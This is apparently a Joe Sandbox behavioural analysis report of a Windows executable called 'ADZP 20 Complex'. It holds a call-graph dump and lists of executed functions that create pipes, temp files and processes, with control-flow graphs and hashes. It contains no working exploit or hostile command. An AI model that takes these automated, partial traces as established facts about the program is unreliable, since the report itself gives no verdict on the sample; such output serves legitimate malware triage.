9606->8812 9607->8818 9608->8820 9609->8822 9610->8824 9611->8828 9612->8834 9613->8836 9614->8838 9615->8840 9616->8844 9617->8850 9619 40e660 21 API calls 9618->9619 9620 403e43 9619->9620 9621 4051a0 3 API calls 9620->9621 9622 403e4c 9621->9622 9623 405060 2 API calls 9622->9623 9624 403e58 FindResourceW 9623->9624 9625 403f13 9624->9625 9626 403e7b 9624->9626 9748 40e520 GetLastError TlsGetValue SetLastError 9625->9748 9627 402664 26 API calls 9626->9627 9629 403e8a 9627->9629 9631 40477d HeapSize 9629->9631 9630 403f1d 9632 40e6c0 4 API calls 9630->9632 9633 403e97 9631->9633 9634 403f25 9632->9634 9695 4011ef 9633->9695 9749 405170 TlsGetValue 9634->9749 9637 403f2c 9642 40e5f0 RtlFreeHeap 9637->9642 9639 403eba 9731 40478d 9639->9731 9640 403edc 9719 40e520 GetLastError TlsGetValue SetLastError 9640->9719 9645 403f43 9642->9645 9644 403ee2 9720 40e520 GetLastError TlsGetValue SetLastError 9644->9720 9648 40e5f0 RtlFreeHeap 9645->9648 9652 403a0d 9648->9652 9650 403eda 9750 40e750 TlsGetValue 9650->9750 9651 403eea 9721 40a330 9651->9721 9652->8853 9655 403f00 9656 40e560 3 API calls 9655->9656 9657 403f0a 9656->9657 9747 40a200 HeapFree 9657->9747 9659->8856 9660->8862 9661->8868 9662->8874 9663->8880 9664->8882 9665->8884 9666->8888 9667->8890 9827 406310 9668->9827 9671->8896 9672->8898 9673->8900 9674->8904 9675->8906 9676->8912 9677->8914 9678->8926 9679->8928 9681 405060 2 API calls 9680->9681 9682 4023cb 9681->9682 9683 405060 2 API calls 9682->9683 9684 4023d8 9683->9684 9856 40b330 9684->9856 9688 402403 9689 40b050 11 API calls 9688->9689 9690 402410 9689->9690 9691 40e5f0 RtlFreeHeap 9690->9691 9692 402437 9691->9692 9693 40e5f0 RtlFreeHeap 9692->9693 9694 402440 9693->9694 9694->8931 9696 4011f7 9695->9696 9696->9696 9697 405060 2 API calls 9696->9697 9698 401210 9697->9698 9751 405700 9698->9751 9701 40a1e0 HeapSize 9702 401225 9701->9702 9703 40e266 4 API calls 9702->9703 9704 401247 9703->9704 9705 40e266 4 API calls 9704->9705 9706 401265 9705->9706 9707 40e266 4 API calls 9706->9707 9708 4014bd 9707->9708 9709 40e266 4 API calls 9708->9709 9710 4014db 9709->9710 9758 40a200 HeapFree 9710->9758 9712 4014e4 9713 40e5f0 RtlFreeHeap 9712->9713 9714 4014f4 9713->9714 9715 40e3b9 2 API calls 9714->9715 9716 4014fe 9715->9716 9717 40e3b9 2 API calls 9716->9717 9718 401507 9717->9718 9718->9639 9718->9640 9719->9644 9720->9651 9722 40a350 9721->9722 9723 40a3a8 9721->9723 9724 40e900 3 API calls 9722->9724 9725 40a403 MultiByteToWideChar 9723->9725 9726 40a379 9724->9726 9728 40e900 3 API calls 9725->9728 9759 40ea90 TlsGetValue 9726->9759 9730 40a420 MultiByteToWideChar 9728->9730 9729 40a39d 9729->9655 9730->9655 9732 40e660 21 API calls 9731->9732 9733 40479b 9732->9733 9734 405060 2 API calls 9733->9734 9735 4047a7 9734->9735 9736 4047ba 9735->9736 9760 402447 9735->9760 9738 4047cb 9736->9738 9769 40b350 9736->9769 9740 40e5f0 RtlFreeHeap 9738->9740 9741 403ed1 9740->9741 9746 40a200 HeapFree 9741->9746 9742 4047dd 9742->9738 9743 40481d 9742->9743 9780 40b630 9742->9780 9745 40b050 11 API calls 9743->9745 9745->9738 9746->9650 9747->9625 9748->9630 9749->9637 9750->9637 9752 405710 WideCharToMultiByte 9751->9752 9753 40570b 9751->9753 9754 40a220 RtlAllocateHeap 9752->9754 9753->9752 9755 405730 9754->9755 9756 405736 WideCharToMultiByte 9755->9756 9757 401218 9755->9757 9756->9757 9757->9701 9758->9712 9759->9729 9761 405060 2 API calls 9760->9761 9762 402458 9761->9762 9791 40b420 9762->9791 9765 40247f 9767 40e5f0 RtlFreeHeap 9765->9767 9766 40b050 11 API calls 9766->9765 9768 402497 9767->9768 9768->9736 9770 40db18 5 API calls 9769->9770 9771 40b365 9770->9771 9772 40b417 9771->9772 9773 40b36f CreateFileW 9771->9773 9772->9742 9774 40b390 CreateFileW 9773->9774 9775 40b3ac 9773->9775 9774->9775 9777 40b3cd 9774->9777 9776 40b3b9 HeapAlloc 9775->9776 9775->9777 9776->9777 9778 40da8a 4 API calls 9777->9778 9779 40b40e 9777->9779 9778->9779 9779->9742 9781 40b642 9780->9781 9782 40b695 9780->9782 9783 40b68d 9781->9783 9784 40dad9 2 API calls 9781->9784 9782->9743 9783->9743 9785 40b65a 9784->9785 9786 40b683 9785->9786 9787 40b672 WriteFile 9785->9787 9788 40b664 9785->9788 9786->9743 9787->9786 9816 40b6a0 9788->9816 9790 40b66c 9790->9743 9794 40b140 9791->9794 9793 40246b 9793->9765 9793->9766 9795 40b158 9794->9795 9796 40db18 5 API calls 9795->9796 9797 40b16f 9796->9797 9798 40b322 9797->9798 9799 40b182 9797->9799 9800 40b1be 9797->9800 9798->9793 9801 40b199 9799->9801 9802 40b19c CreateFileW 9799->9802 9803 40b1c3 9800->9803 9804 40b1fc 9800->9804 9801->9802 9809 40b268 9802->9809 9805 40b1da 9803->9805 9806 40b1dd CreateFileW 9803->9806 9807 40b227 CreateFileW 9804->9807 9804->9809 9805->9806 9806->9809 9808 40b249 CreateFileW 9807->9808 9807->9809 9808->9809 9810 40b2a2 9809->9810 9812 40b28e HeapAlloc 9809->9812 9813 40b2f0 9809->9813 9810->9813 9814 40b2dc SetFilePointer 9810->9814 9811 40da8a 4 API calls 9811->9798 9812->9810 9813->9811 9815 40b301 9813->9815 9814->9813 9815->9793 9817 40b7a7 9816->9817 9818 40b6ba 9816->9818 9817->9790 9819 40b6c0 SetFilePointer 9818->9819 9820 40b6eb 9818->9820 9819->9820 9822 40b0c0 WriteFile 9820->9822 9824 40b6f7 9820->9824 9821 40b727 9821->9790 9823 40b76e 9822->9823 9823->9824 9825 40b775 WriteFile 9823->9825 9824->9821 9826 40b711 memcpy 9824->9826 9825->9790 9826->9790 9828 40631f 9827->9828 9829 406438 9828->9829 9839 4063ae 9828->9839 9830 40e880 TlsGetValue 9829->9830 9831 406442 9830->9831 9832 40645a 9831->9832 9833 40644a _wcsdup 9831->9833 9834 40e880 TlsGetValue 9832->9834 9833->9832 9835 406460 9834->9835 9836 406477 9835->9836 9837 406468 _wcsdup 9835->9837 9838 40e880 TlsGetValue 9836->9838 9837->9836 9840 406480 9838->9840 9841 4063fc wcsncpy 9839->9841 9843 403ad4 9839->9843 9842 406488 _wcsdup 9840->9842 9845 406498 9840->9845 9841->9839 9842->9845 9843->8893 9844 40e900 3 API calls 9846 406520 9844->9846 9845->9844 9847 406572 wcsncpy 9846->9847 9848 406526 9846->9848 9851 40658d 9846->9851 9847->9851 9849 4065e4 9848->9849 9850 4065db free 9848->9850 9852 4065f7 9849->9852 9853 4065eb free 9849->9853 9850->9849 9851->9848 9855 406625 wcsncpy 9851->9855 9852->9843 9854 4065fe free 9852->9854 9853->9852 9854->9843 9855->9851 9857 40b140 15 API calls 9856->9857 9858 4023eb 9857->9858 9858->9690 9859 40b600 9858->9859 9860 40dad9 2 API calls 9859->9860 9861 40b60f 9860->9861 9862 40b623 9861->9862 9865 40b500 9861->9865 9862->9688 9864 40b620 9864->9688 9866 40b5f4 9865->9866 9867 40b514 9865->9867 9866->9864 9867->9866 9868 40b528 9867->9868 9869 40b58d 9867->9869 9870 40b560 9868->9870 9871 40b538 9868->9871 9883 40b7b0 WideCharToMultiByte 9869->9883 9870->9870 9873 40b56b WriteFile 9870->9873 9876 40b6a0 4 API calls 9871->9876 9873->9864 9874 40b5a7 9875 40b5eb 9874->9875 9877 40b5b7 9874->9877 9878 40b5c8 WriteFile 9874->9878 9875->9864 9880 40b55a 9876->9880 9881 40b6a0 4 API calls 9877->9881 9879 40b5dc HeapFree 9878->9879 9879->9875 9880->9864 9882 40b5c2 9881->9882 9882->9879 9884 40b7d5 HeapAlloc 9883->9884 9885 40b80e 9883->9885 9886 40b809 9884->9886 9887 40b7ec WideCharToMultiByte 9884->9887 9885->9874 9886->9874 9887->9886 9888->8960 9889->8962 9890->8971 9892 4024a3 9891->9892 9892->9892 9893 40e660 21 API calls 9892->9893 9894 4024b5 9893->9894 9895 4051a0 3 API calls 9894->9895 9914 4024be 9895->9914 9896 40253f 9959 40e520 GetLastError TlsGetValue SetLastError 9896->9959 9898 402545 9960 40e520 GetLastError TlsGetValue SetLastError 9898->9960 9899 40e520 GetLastError TlsGetValue SetLastError 9899->9914 9901 40254d GetCommandLineW 9903 40a240 4 API calls 9901->9903 9902 405dc0 3 API calls 9902->9914 9904 40255a 9903->9904 9906 40e560 3 API calls 9904->9906 9905 40e560 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 9905->9914 9907 402564 9906->9907 9961 40e520 GetLastError TlsGetValue SetLastError 9907->9961 9909 40256e 9911 40e6c0 4 API calls 9909->9911 9910 40e6c0 wcslen TlsGetValue RtlReAllocateHeap HeapReAlloc 9910->9914 9912 402576 9911->9912 9913 40e560 3 API calls 9912->9913 9915 402580 PathRemoveArgsW 9913->9915 9914->9896 9914->9899 9914->9902 9914->9905 9914->9910 9916 402597 9915->9916 9917 4025fd 9916->9917 9962 40e520 GetLastError TlsGetValue SetLastError 9916->9962 9919 4099a5 SetEnvironmentVariableW 9917->9919 9921 40260a 9919->9921 9920 4025a9 9922 40e6c0 4 API calls 9920->9922 9975 40e520 GetLastError TlsGetValue SetLastError 9921->9975 9924 4025b6 9922->9924 9963 40e520 GetLastError TlsGetValue SetLastError 9924->9963 9925 402614 9927 40e6c0 4 API calls 9925->9927 9929 40261c 9927->9929 9928 4025bc 9964 40e520 GetLastError TlsGetValue SetLastError 9928->9964 9976 405170 TlsGetValue 9929->9976 9932 402623 9935 40e5f0 RtlFreeHeap 9932->9935 9933 4025c4 9965 40e520 GetLastError TlsGetValue SetLastError 9933->9965 9938 40263b 9935->9938 9936 4025cc 9966 40e520 GetLastError TlsGetValue SetLastError 9936->9966 9940 40e5f0 RtlFreeHeap 9938->9940 9939 4025d4 9967 406110 9939->9967 9942 402644 9940->9942 9944 40e5f0 RtlFreeHeap 9942->9944 9943 4025e5 9974 405182 TlsGetValue 9943->9974 9946 40264d 9944->9946 9948 40e5f0 RtlFreeHeap 9946->9948 9947 4025ea 9950 402656 9948->9950 9952 40e5f0 RtlFreeHeap 9950->9952 9954 401eb5 9952->9954 9954->8977 9956->8972 9957->8983 9958->8992 9959->9898 9960->9901 9961->9909 9962->9920 9963->9928 9964->9933 9965->9936 9966->9939 9968 406146 9967->9968 9969 406118 9967->9969 9986 40e9e0 TlsGetValue 9968->9986 9977 406080 9969->9977 9971 40614f 9971->9943 9974->9947 9975->9925 9976->9932 9978 40e880 TlsGetValue 9977->9978 9979 40609c 9978->9979 9980 40e900 3 API calls 9979->9980 9981 4060a8 9980->9981 9986->9971 9989->9012 9990->9018 10091->9103 10092->9107 10093->9102 10094->9106 10095->9110 10096->9114 10097->9118 10393 40a46f HeapAlloc 10392->10393 10394 40a558 10392->10394 10393->7888 10393->7889 10419 40a79a 10394->10419 10396 40a560 10397 40dfc6 9 API calls 10396->10397 10398 40a568 HeapFree HeapFree 10397->10398 10399 40a5a3 HeapFree 10398->10399 10400 40a58f 10398->10400 10399->10393 10401 40a590 HeapFree 10400->10401 10401->10401 10402 40a5a2 10401->10402 10402->10399 10404 40deba 10403->10404 10405 40df72 RtlAllocateHeap 10404->10405 10406 40dec6 10404->10406 10408 40df87 10405->10408 10409 40a4f6 HeapAlloc 10405->10409 10426 40e0c3 LoadLibraryW 10406->10426 10408->10409 10411 40dfb0 InitializeCriticalSection 10408->10411 10409->7888 10411->10409 10412 40deeb 10413 40df07 HeapAlloc 10412->10413 10414 40df65 LeaveCriticalSection 10412->10414 10413->10414 10415 40df1d 10413->10415 10414->10409 10417 40de99 6 API calls 10415->10417 10418 40df34 10417->10418 10418->10414 10423 40a7ae 10419->10423 10420 40a7f7 memset 10421 40a810 10420->10421 10421->10396 10422 40a7b9 HeapFree 10422->10423 10423->10420 10423->10422 10424 41242a RtlFreeHeap 10423->10424 10425 40ddcb 3 API calls 10423->10425 10424->10423 10425->10423 10427 40e0e0 GetProcAddress 10426->10427 10428 40e10b InterlockedCompareExchange 10426->10428 10429 40e100 FreeLibrary 10427->10429 10434 40e0f0 10427->10434 10430 40e11b 10428->10430 10431 40e12f InterlockedExchange 10428->10431 10429->10428 10432 40ded5 EnterCriticalSection 10429->10432 10430->10432 10435 40e120 Sleep 10430->10435 10431->10432 10432->10412 10434->10429 10435->10430 10436->7904 10437->7906 10438->7908 10439->7910 10440->7914 10441->7920 10442->7922 10443->7924 10444->7926 10445->7930 10446->7938 10447->7944 10448->7946 10449->7953 10450->7955 10451->7957 10452->7959 10453->7963 10454->7969 10455->7971 10456->7973 10457->7975 10458->7979 10459->7985 10460->7991 10461->7997 10462->7999 10463->8005 10464->8011 10731 402e03 10732 40e660 21 API calls 10731->10732 10733 402e09 10732->10733 10734 40ab74 5 API calls 10733->10734 10735 402e14 10734->10735 10744 40e520 GetLastError TlsGetValue SetLastError 10735->10744 10737 402e1a 10745 40e520 GetLastError TlsGetValue SetLastError 10737->10745 10739 402e22 10740 40a240 4 API calls 10739->10740 10741 402e2d 10740->10741 10742 40e560 3 API calls 10741->10742 10743 402e3c 10742->10743 10744->10737 10745->10739 10776 406289 10777 406290 10776->10777 10777->10777 10780 40ea90 TlsGetValue 10777->10780 10779 4062b5 10780->10779 10485 40b6a0 10486 40b7a7 10485->10486 10487 40b6ba 10485->10487 10488 40b6c0 SetFilePointer 10487->10488 10489 40b6eb 10487->10489 10488->10489 10491 40b0c0 WriteFile 10489->10491 10493 40b6f7 10489->10493 10490 40b727 10492 40b76e 10491->10492 10492->10493 10494 40b775 WriteFile 10492->10494 10493->10490 10495 40b711 memcpy 10493->10495 10496 40242d 10497 40242f 10496->10497 10498 40e5f0 RtlFreeHeap 10497->10498 10499 402437 10498->10499 10500 40e5f0 RtlFreeHeap 10499->10500 10501 402440 10500->10501

                    Executed Functions

                    Function 0040ADD6 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 40libraryloaderCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                      • Part of subcall function 0040E900: TlsGetValue.KERNEL32(0000000D,00001000,00000000,00000000), ref: 0040E90C
                      • Part of subcall function 0040E900: RtlReAllocateHeap.NTDLL(02200000,00000000,?,?), ref: 0040E967
                    • GetTempPathW.KERNEL32(00000104,00000000,00000104,00000000,?,?,?,00000000,00401A1E,00000000,00000000,00000400,00000000,00000000,00000000,00000000), ref: 0040ADED
                    • LoadLibraryW.KERNEL32(Kernel32.DLL,?,?,?,00000000,00401A1E,00000000,00000000,00000400,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040ADFA
                    • GetProcAddress.KERNEL32(00000000,GetLongPathNameW), ref: 0040AE0C
                    • GetLongPathNameW.KERNELBASE(00000000,00000000,00000104,?,?,?,00000000,00401A1E,00000000,00000000,00000400,00000000,00000000,00000000,00000000,00000000), ref: 0040AE19
                    • FreeLibrary.KERNEL32(00000000,?,?,?,00000000,00401A1E,00000000,00000000,00000400,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040AE1E
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.3241664003.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.3238898610.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3246045104.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3252525845.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3256164934.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: LibraryPath$AddressAllocateFreeHeapLoadLongNameProcTempValue
                    • String ID: GetLongPathNameW$Kernel32.DLL
                    • API String ID: 1993255246-2943376620
                    • Opcode ID: b269ce3a440ba4175cabcfb75d30ea3c0961c0f40c5e72e3f128e2335a594a21
                    • Instruction ID: e37525813661028bcc8eb249af8eccfe35d88e27d7fdedfae3674fb0e28627f1
                    • Opcode Fuzzy Hash: b269ce3a440ba4175cabcfb75d30ea3c0961c0f40c5e72e3f128e2335a594a21
                    • Instruction Fuzzy Hash: FAF082722452547FC3216BB6AC8CEEB3EACDF86755300443AF905E2251EA7C5D2086BD
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00409A1F Relevance: 73.9, APIs: 40, Strings: 2, Instructions: 395memorypipesynchronizationCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 0 409a1f-409a88 memset 1 409a9a-409a9b 0->1 2 409a8a-409a98 0->2 3 409aa3-409aac 1->3 2->3 4 409ad5-409ad8 3->4 5 409aae-409ab7 3->5 6 409b20-409b29 4->6 7 409ada-409add 4->7 5->4 8 409ab9-409abe 5->8 10 409bbb-409bc3 6->10 11 409b2f-409b32 6->11 7->6 9 409adf-409af5 CreatePipe 7->9 8->4 12 409ac0-409ad3 8->12 9->6 14 409af7-409b15 call 4099c7 9->14 15 409bc5-409bd2 10->15 16 409c07-409c15 10->16 17 409b34-409b4a CreatePipe 11->17 18 409b75-409b78 11->18 13 409b1d 12->13 13->6 14->13 20 409bd4-409bd8 GetStdHandle 15->20 21 409bdf-409be6 15->21 22 409c17 16->22 23 409c19-409c20 16->23 17->18 24 409b4c-409b6d call 4099c7 17->24 18->10 25 409b7a-409b90 CreatePipe 18->25 20->21 27 409bf3-409bfa 21->27 28 409be8-409bec GetStdHandle 21->28 22->23 30 409c22 23->30 31 409c29-409c62 wcslen * 2 HeapAlloc 23->31 24->18 25->10 32 409b92-409bb3 call 4099c7 25->32 27->16 34 409bfc-409c00 GetStdHandle 27->34 28->27 30->31 36 409c64-409c84 wcscpy wcscat * 2 31->36 37 409c86-409c8e wcscpy 31->37 32->10 34->16 38 409c8f-409c9b 36->38 37->38 40 409cba-409cc3 38->40 41 409c9d-409cb8 wcscat * 2 38->41 42 409cd5-409cf2 CreateProcessW 40->42 43 409cc5-409cce 40->43 41->40 44 409cf8-409d02 42->44 45 409d9e-409da8 42->45 43->42 48 409d04-409d08 CloseHandle 44->48 49 409d0a-409d0e 44->49 46 409db0-409db4 45->46 47 409daa-409dae CloseHandle 45->47 50 409db6-409dba CloseHandle 46->50 51 409dbc-409dc0 46->51 47->46 48->49 52 409d10-409d14 CloseHandle 49->52 53 409d16-409d1a 49->53 50->51 54 409dc2-409dc6 CloseHandle 51->54 55 409dc8-409dcc 51->55 52->53 56 409d22-409d32 CloseHandle 53->56 57 409d1c-409d20 CloseHandle 53->57 54->55 58 409dd4-409dd8 55->58 59 409dce-409dd2 CloseHandle 55->59 60 409d40-409d44 56->60 61 409d34-409d3a WaitForSingleObject 56->61 57->56 62 409de0-409de4 58->62 63 409dda-409dde CloseHandle 58->63 59->58 64 409d93-409d99 CloseHandle 60->64 65 409d46-409d8e EnterCriticalSection call 40e1f2 LeaveCriticalSection 60->65 61->60 67 409de6-409dea CloseHandle 62->67 68 409dec-409df4 62->68 63->62 66 409f27-409f29 64->66 71 409f2a 65->71 66->71 67->68 68->71 72 409dfa-409e01 68->72 75 409f2c-409f49 HeapFree 71->75 73 409e03-409e12 wcslen 72->73 74 409e47-409ebb memset ShellExecuteExW 72->74 73->74 76 409e14-409e18 73->76 74->71 77 409ebd-409ec7 74->77 78 409e21-409e23 76->78 79 409e1a-409e1f 76->79 80 409ed8-409edc 77->80 81 409ec9-409ed2 WaitForSingleObject 77->81 78->74 82 409e25-409e42 wcscpy 78->82 79->76 79->78 83 409f1e-409f25 CloseHandle 80->83 84 409ede-409f1c EnterCriticalSection call 40e1f2 LeaveCriticalSection 80->84 81->80 82->74 83->66 84->75
                    APIs
                    • memset.MSVCRT ref: 00409A69
                    • CreatePipe.KERNEL32(?,?,?,00000000,?,?,00000000,00000000,00404626,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00409AF1
                    • CreatePipe.KERNEL32(?,?,?,00000000,?,?,00000000,00000000,00404626,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00409B46
                    • CreatePipe.KERNEL32(?,?,?,00000000,?,?,00000000,00000000,00404626,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00409B8C
                    • GetStdHandle.KERNEL32(000000F6), ref: 00409BD6
                    • GetStdHandle.KERNEL32(000000F5), ref: 00409BEA
                    • GetStdHandle.KERNEL32(000000F4), ref: 00409BFE
                    • wcslen.MSVCRT ref: 00409C2A
                    • wcslen.MSVCRT ref: 00409C38
                    • HeapAlloc.KERNEL32(00000000,00000000), ref: 00409C52
                    • wcscpy.MSVCRT ref: 00409C6A
                    • wcscat.MSVCRT ref: 00409C71
                    • wcscat.MSVCRT ref: 00409C7C
                    • wcscpy.MSVCRT ref: 00409C88
                    • wcscat.MSVCRT ref: 00409CA3
                    • wcscat.MSVCRT ref: 00409CB0
                    • CreateProcessW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,00000000,?,?,?), ref: 00409CEA
                    • CloseHandle.KERNEL32(?,?,00000000,?,?,?), ref: 00409D08
                    • CloseHandle.KERNEL32(?,?,00000000,?,?,?), ref: 00409D14
                    • CloseHandle.KERNEL32(?,?,00000000,?,?,?), ref: 00409D20
                    • CloseHandle.KERNEL32(?,?,00000000,?,?,?), ref: 00409D26
                    • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,?,?,?), ref: 00409D3A
                    • EnterCriticalSection.KERNEL32(00418730,?,00000000,?,?,?), ref: 00409D4C
                    • LeaveCriticalSection.KERNEL32(00418730,?,00000000,?,?,?), ref: 00409D63
                    • CloseHandle.KERNEL32(?,?,00000000,?,?,?), ref: 00409D97
                    • CloseHandle.KERNEL32(?,?,00000000,?,?,?), ref: 00409DAE
                    • CloseHandle.KERNEL32(?,?,00000000,?,?,?), ref: 00409DBA
                    • CloseHandle.KERNEL32(?,?,00000000,?,?,?), ref: 00409DC6
                    • CloseHandle.KERNEL32(?,?,00000000,?,?,?), ref: 00409DD2
                    • CloseHandle.KERNEL32(?,?,00000000,?,?,?), ref: 00409DDE
                    • CloseHandle.KERNEL32(?,?,00000000,?,?,?), ref: 00409DEA
                    • wcslen.MSVCRT ref: 00409E04
                    • wcscpy.MSVCRT ref: 00409E2A
                    • memset.MSVCRT ref: 00409E56
                    • ShellExecuteExW.SHELL32 ref: 00409EB3
                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00409ED2
                    • EnterCriticalSection.KERNEL32(00418730), ref: 00409EE4
                    • LeaveCriticalSection.KERNEL32(00418730), ref: 00409EFB
                      • Part of subcall function 004099C7: GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002,00000000,?,?,00409BAF,?), ref: 004099D6
                      • Part of subcall function 004099C7: GetCurrentProcess.KERNEL32(?,00000000,?,?,00409BAF,?), ref: 004099E2
                      • Part of subcall function 004099C7: DuplicateHandle.KERNEL32(00000000,?,?,00409BAF,?), ref: 004099E9
                      • Part of subcall function 004099C7: CloseHandle.KERNEL32(?,?,?,00409BAF,?), ref: 004099F5
                    • HeapFree.KERNEL32(00000000,?), ref: 00409F37
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.3241664003.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.3238898610.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3246045104.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3252525845.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3256164934.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: Handle$Close$CreateCriticalSectionwcscat$PipeProcesswcscpywcslen$CurrentEnterHeapLeaveObjectSingleWaitmemset$AllocDuplicateExecuteFreeShell
                    • String ID: $0A$x
                    • API String ID: 550696126-3693508903
                    • Opcode ID: b00f057bc40639e3ebc36098d4fb4d898885556d00f241ad15d102da0fe35fa9
                    • Instruction ID: 1938edec6f8ec7f018cd84e447521b205a2f1ffc1a01eed9409a43f0bd8935e3
                    • Opcode Fuzzy Hash: b00f057bc40639e3ebc36098d4fb4d898885556d00f241ad15d102da0fe35fa9
                    • Instruction Fuzzy Hash: 8AE15B71908341AFD321DF24D841B9BBBE4FF84350F148A3FF499A2291DB799944CB9A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040196C Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 168COMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                      • Part of subcall function 0040E660: TlsGetValue.KERNEL32(0000000D,?,00402EF9,00000000,00000000,00000000,00000000,?,0040118D,00000000,00000000,00000000,00000001,00000004,00000000,00417064), ref: 0040E677
                    • GetTempFileNameW.KERNEL32(?,00417024,00000000,00000000,?,00000000,00000000,00000400,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00404519), ref: 00401A3B
                    • GetTempFileNameW.KERNEL32(00417024,00000000,00000000,00000000,?,00000000,00000000,?,00417024,00000000,00000000,?,00000000,00000000,00000400,00000000), ref: 00401A90
                    • GetTempFileNameW.KERNEL32(00417024,00000000,00000000,00000000,?,00000000,00000000,00417024,00000000,00000000,00000000,?,00000000,00000000,?,00417024), ref: 00401AE5
                    • PathAddBackslashW.SHLWAPI(00417024,00000000,00000000,00000000,?,00000000,00000000,00417024,00000000,00000000,00000000,?,00000000,00000000,?,00417024), ref: 00401AF0
                    • PathRenameExtensionW.SHLWAPI(?,00000000,?,00000000,00000000,00417024,00000000,00000000,00000000,?,00000000,00000000,00417024,00000000,00000000,00000000), ref: 00401B2F
                    • GetTempFileNameW.KERNEL32(00417024,00000000,00000000,?,00000000,?,00000000,00000000,00417024,00000000,00000000,00000000,?,00000000,00000000,00417024), ref: 00401B49
                      • Part of subcall function 0040E520: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040E526
                      • Part of subcall function 0040E520: TlsGetValue.KERNEL32(0000000D), ref: 0040E535
                      • Part of subcall function 0040E520: SetLastError.KERNEL32(?), ref: 0040E54B
                      • Part of subcall function 0040E560: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040E56C
                      • Part of subcall function 0040E560: RtlAllocateHeap.NTDLL(02200000,00000000,?), ref: 0040E599
                      • Part of subcall function 0040E6C0: wcslen.MSVCRT ref: 0040E6D7
                      • Part of subcall function 0040E560: RtlReAllocateHeap.NTDLL(02200000,00000000,?,?), ref: 0040E5BC
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.3241664003.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.3238898610.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3246045104.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3252525845.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3256164934.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: FileNameTemp$Value$AllocateErrorHeapLastPath$BackslashExtensionRenamewcslen
                    • String ID: $pA$$pA$$pA$$pA
                    • API String ID: 368575804-1531182785
                    • Opcode ID: 43ebda8593a92aa5bcc9b73b08c12452a331b9e9f1a1c6ad17b213a13871d9c3
                    • Instruction ID: 7226354e244135f3a7293121bd0c5faf706f4cf1cd60fca57ba481f11b9cb304
                    • Opcode Fuzzy Hash: 43ebda8593a92aa5bcc9b73b08c12452a331b9e9f1a1c6ad17b213a13871d9c3
                    • Instruction Fuzzy Hash: 3D510F71104304BED600BBB2DC42E7F7A6DEB84308F018C3FB540A50E2EA3D99655A6E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00401000 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 108memoryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                    • memset.MSVCRT ref: 0040100F
                    • GetModuleHandleW.KERNEL32(00000000), ref: 0040101C
                    • HeapCreate.KERNEL32(00000000,00001000,00000000,00000000), ref: 00401035
                      • Part of subcall function 0040E4D0: HeapCreate.KERNELBASE(00000000,00001000,00000000,?,00401053,00000000,00001000,00000000,00000000), ref: 0040E4DC
                      • Part of subcall function 0040E4D0: TlsAlloc.KERNEL32(?,00401053,00000000,00001000,00000000,00000000), ref: 0040E4E7
                      • Part of subcall function 0040A1C0: HeapCreate.KERNELBASE(00000000,00001000,00000000,0040106C,00000000,00001000,00000000,00000000), ref: 0040A1C9
                      • Part of subcall function 00409669: InitializeCriticalSection.KERNEL32(00418730,00000004,00000004,0040963C,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 00409691
                      • Part of subcall function 00408DEE: memset.MSVCRT ref: 00408DFB
                      • Part of subcall function 00408DEE: InitCommonControlsEx.COMCTL32(00000008,00001000), ref: 00408E15
                      • Part of subcall function 00408DEE: CoInitialize.OLE32(00000000), ref: 00408E1D
